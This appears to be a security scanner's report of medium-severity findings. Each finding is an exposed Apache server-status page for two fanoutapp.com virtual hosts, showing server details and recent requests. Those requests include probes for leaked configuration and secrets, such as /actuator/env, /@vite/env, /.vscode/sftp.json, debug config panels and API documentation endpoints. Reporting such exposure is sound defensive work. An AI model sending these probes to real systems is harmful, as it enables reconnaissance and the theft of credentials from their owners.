HTTP/1.1 0-348387940/9/982_ 0.259376580.00.093.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-348387940/8/995_ 0.24123101280.00.012.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-348387940/10/981_ 0.2313382990.00.022.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-348387940/7/1000_ 0.2315485720.00.013.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-348387940/4/986_ 0.2317371760.00.013.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-348387940/9/1016_ 0.2321472890.00.023.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-348387940/10/1005_ 0.2318376140.00.023.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-348387940/8/994_ 0.2316389780.00.093.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-348387940/8/1014_ 0.258370360.00.013.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-348387940/6/1009_ 0.2319386770.00.023.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-348387940/10/1020_ 0.23143101520.00.023.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-348387940/8/994_ 0.257370090.00.012.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-348387940/4/992_ 0.255373180.00.012.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-348387940/8/998_ 0.250394390.00.013.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-348387940/7/988_ 0.252367050.00.023.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-348387940/6/1009_ 0.256380620.00.013.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-348387940/8/1008_ 0.2410377850.00.012.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-348387940/6/996_ 0.2323398530.00.013.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-348387940/8/990_ 0.251390680.00.022.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3483879427/10/1001W 0.220086490.00.022.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-348387940/7/995_ 0.253391490.00.012.91 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-348387940/6/991_ 0.2323495900.00.012.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-348387940/8/974_ 0.2322372820.00.022.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-348387940/10/1021_ 0.2321392400.00.023.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-348387930/12/1164_ 0.21173151580.00.023.35 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-348387930/11/1162_ 0.21183105930.00.023.35 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-348387930/11/1136_ 0.21193121590.00.023.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-348387930/11/1185_ 0.21203111270.00.013.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-348387930/7/1133_ 0.21233109200.00.013.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-348387930/10/1176_ 0.21123109950.00.013.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-348387930/13/1177_ 0.2111381500.00.023.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-348387930/11/1164_ 0.219383250.00.023.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-348387930/13/1161_ 0.21103104920.00.023.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-348387930/12/1163_ 0.218382330.00.093.19 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-348387930/13/1169_ 0.216399010.00.023.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-348387930/13/1150_ 0.213386650.00.023.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-348387930/11/1138_ 0.2116378260.00.023.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-348387930/10/1151_ 0.215494940.00.023.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-348387930/11/1152_ 0.21154105250.00.023.23 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-348387930/11/1153_ 0.2114395270.00.023.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-348387930/9/1163_ 0.214386980.00.013.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-348387930/13/1141_ 0.2223102600.00.103.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-348387930/12/1136_ 0.221378990.00.093.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-348387930/13/1177_ 0.220398010.00.023.19 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-348387930/12/1154_ 0.2023396000.00.023.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api HTTP/1.1 1-348387930/10/1154_ 0.2123483760.00.013.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-348387930/14/1143_ 0.2123391880.00.023.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-348387930/12/1173_ 0.211339027
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf4d7db974
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 23-Dec-2025 04:11:44 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 31 days 6 hours 17 minutes 8 seconds Server load: 0.16 0.15 0.16 Total accesses: 68593 - Total Traffic: 198.9 MB - Total Duration: 593539 CPU Usage: u55.06 s83.88 cu898.69 cs260.87 - .0481% CPU load .0254 requests/sec - 77 B/second - 3041 B/request - 8.65306 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0659656no1yes124000 1659655no1yes025000 Sum202 149000 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-326596560/12/951_ 0.1953129080.00.022.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-326596560/9/913_ 0.1911371180.00.023.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-326596560/9/922_ 0.1911398180.00.022.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-326596560/10/904_ 0.1912377550.00.022.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-326596560/10/932_ 0.1914382830.00.023.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-326596560/9/919_ 0.198367780.00.022.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-326596560/10/940_ 0.199363680.00.022.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-326596560/9/937_ 0.196372670.00.022.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-326596560/8/923_ 0.193380260.00.023.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-326596560/12/939_ 0.192363480.00.023.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-326596560/8/941_ 0.191382490.00.023.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-326596560/11/952_ 0.190392260.00.023.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-326596560/10/921_ 0.197365770.00.022.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3265965627/9/922W 0.180067230.00.022.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-326596560/10/925_ 0.1822384340.00.022.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-326596560/10/914_ 0.1821361370.00.022.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-326596560/9/942_ 0.1821375890.00.023.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-326596560/9/932_ 0.1821372690.00.022.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-326596560/10/930_ 0.1821393960.00.022.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-326596560/9/920_ 0.1819387120.00.092.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-326596560/8/923_ 0.1818381530.00.022.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-326596560/8/923_ 0.1817383590.00.022.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-326596560/10/925_ 0.1816392190.00.022.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-326596560/9/897_ 0.1915368100.00.022.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-326596560/10/949_ 0.1915388010.00.023.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-326596550/29/1078_ 0.4903146540.00.083.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-326596550/28/1079_ 0.490393870.00.073.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-326596550/27/1056_ 0.47233108230.00.072.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-326596550/28/1096_ 0.47233102710.00.083.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-326596550/27/1056_ 0.47233104220.00.072.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-326596550/27/1089_ 0.47223101890.00.073.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-326596550/26/1090_ 0.4721370130.00.073.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-326596550/27/1073_ 0.4820375880.00.072.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-326596550/25/1066_ 0.4919390460.00.073.03 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-326596550/26/1073_ 0.4916374030.00.072.88 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-326596550/28/1086_ 0.4918493990.00.073.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-326596550/27/1065_ 0.4916375990.00.082.87 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-326596550/26/1056_ 0.4915372900.00.073.08 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-326596550/27/1063_ 0.4914386280.00.083.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-326596550/24/1071_ 0.4913389050.00.063.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-326596550/27/1060_ 0.4912385760.00.073.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-326596550/26/1081_ 0.4911382270.00.073.18 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-326596550/26/1058_ 0.4910392130.00.072.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-326596550/27/1051_ 0.499372160.00.073.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-326596550/26/1087_ 0.497388920.00.072.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-326596550/26/1071_ 0.496389900.00.073.03 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-326596550/28/1065_ 0.495368600.00.083.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-326596550/26/1055_ 0.493385530.00.072.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-326596550/28/1088_ 0.4933798
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf2f1ac4f5
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 21-Dec-2025 10:14:01 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 31 Parent Server MPM Generation: 30 Server uptime: 29 days 12 hours 19 minutes 26 seconds Server load: 0.28 0.21 0.17 Total accesses: 65302 - Total Traffic: 188.8 MB - Total Duration: 568302 CPU Usage: u52.22 s79.07 cu845.9 cs245.19 - .0479% CPU load .0256 requests/sec - 77 B/second - 3031 B/request - 8.70267 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0480302no1yes025010 1480301no1yes124010 Sum202 149020 _____________________________W____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-304803020/14/904_ 0.27123118880.00.052.77 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-304803020/12/864_ 0.293368380.00.183.01 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-304803020/11/881_ 0.294390430.00.022.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-304803020/11/849_ 0.295374620.00.022.39 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-304803020/12/889_ 0.295381210.00.033.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-304803020/11/869_ 0.287363420.00.022.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-304803020/11/893_ 0.289361960.00.022.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-304803020/11/893_ 0.2810370960.00.022.88 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-304803020/12/880_ 0.2714372800.00.033.14 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-304803020/8/890_ 0.2713361040.00.022.98 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-304803020/10/893_ 0.292380320.00.093.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-304803020/9/903_ 0.2716481310.00.023.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-304803020/10/876_ 0.290363100.00.022.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-304803020/14/880_ 0.290364420.00.032.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-304803020/9/876_ 0.2623476840.00.022.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-304803020/12/866_ 0.2716357740.00.032.90 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-304803020/11/897_ 0.2723374040.00.023.03 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-304803020/9/890_ 0.2723370400.00.022.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-304803020/11/885_ 0.2722383560.00.022.71 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-304803020/11/873_ 0.2715383870.00.032.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-304803020/9/876_ 0.2811377420.00.022.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-304803020/12/877_ 0.2721380080.00.032.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-304803020/10/881_ 0.2719381370.00.032.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-304803020/9/850_ 0.2719364820.00.022.53 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-304803020/10/900_ 0.2718379870.00.032.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-304803010/14/991_ 0.3723132610.00.052.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-304803010/12/986_ 0.376389070.00.042.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-304803010/9/972_ 0.3733103920.00.022.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-304803010/8/1007_ 0.372398410.00.042.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3048030127/9/970W 0.360099340.00.022.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-304803010/12/1004_ 0.3623396920.00.043.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-304803010/8/1008_ 0.3617365600.00.032.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-304803010/9/987_ 0.3615370680.00.022.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-304803010/10/990_ 0.371387010.00.032.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-304803010/12/980_ 0.3617467980.00.032.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-304803010/10/997_ 0.3619383960.00.033.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-304803010/11/981_ 0.3619371640.00.102.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-304803010/8/973_ 0.3623370200.00.022.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-304803010/12/973_ 0.3622382350.00.033.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-304803010/11/991_ 0.3622384410.00.032.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-304803010/10/972_ 0.3621479600.00.053.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-304803010/10/998_ 0.3616378350.00.022.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-304803010/10/976_ 0.3613388580.00.032.73 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-304803010/8/968_ 0.3613366770.00.022.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-304803010/10/1001_ 0.3611384020.00.022.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-304803010/10/988_ 0.3711384260.00.162.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-304803010/7/974_ 0.379363580.00.022.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-304803010/11/976_ 0.378382080.00.032.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-304803010/10/1004_ 0.37837459
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf50d9fce9
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 19-Dec-2025 00:01:52 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 29 Parent Server MPM Generation: 28 Server uptime: 27 days 2 hours 7 minutes 17 seconds Server load: 0.27 0.19 0.18 Total accesses: 61282 - Total Traffic: 177.2 MB - Total Duration: 538780 CPU Usage: u47.3 s72.82 cu792.54 cs228.4 - .0488% CPU load .0262 requests/sec - 79 B/second - 3031 B/request - 8.79181 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0302996no1yes124010 1302995no1yes025010 Sum202 149020 _W________________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283029960/2/790_ 0.0303107880.00.012.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2830299627/1/760W 0.020062400.00.002.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-283029960/1/777_ 0.0222380920.00.002.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-283029960/1/737_ 0.0222370640.00.002.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-283029960/1/786_ 0.0221371440.00.002.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-283029960/1/751_ 0.0221357360.00.002.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-283029960/1/777_ 0.0221356270.00.002.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-283029960/1/782_ 0.0319365080.00.002.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-283029960/1/761_ 0.0318361220.00.002.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-283029960/1/781_ 0.0317352870.00.002.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-283029960/1/784_ 0.0316374350.00.003.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-283029960/1/799_ 0.0315378280.00.002.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-283029960/1/758_ 0.0314357630.00.002.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-283029960/1/775_ 0.0314360850.00.002.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-283029960/1/759_ 0.0313370800.00.002.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-283029960/1/761_ 0.0311453480.00.002.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-283029960/1/787_ 0.0310368590.00.002.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-283029960/1/786_ 0.0310365900.00.002.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-283029960/1/774_ 0.038366520.00.002.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-283029960/1/767_ 0.037379700.00.002.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-283029960/1/764_ 0.036366010.00.002.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-283029960/1/768_ 0.035375440.00.002.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-283029960/1/776_ 0.033372380.00.002.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-283029960/1/741_ 0.032459970.00.002.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-283029960/1/787_ 0.031374460.00.002.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-283029950/2/935_ 0.0402116870.00.082.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-283029950/1/933_ 0.0124280650.00.072.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-283029950/1/923_ 0.03234101860.00.002.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql HTTP/1.1 1-283029950/1/956_ 0.0322387980.00.002.82 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api HTTP/1.1 1-283029950/1/922_ 0.0322395780.00.002.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-283029950/1/950_ 0.0321390820.00.003.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-283029950/1/955_ 0.0321363170.00.002.81 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-283029950/1/932_ 0.0319368950.00.002.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-283029950/1/940_ 0.0318380520.00.002.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-283029950/1/928_ 0.0315366270.00.002.49 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-283029950/1/947_ 0.0316380440.00.002.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 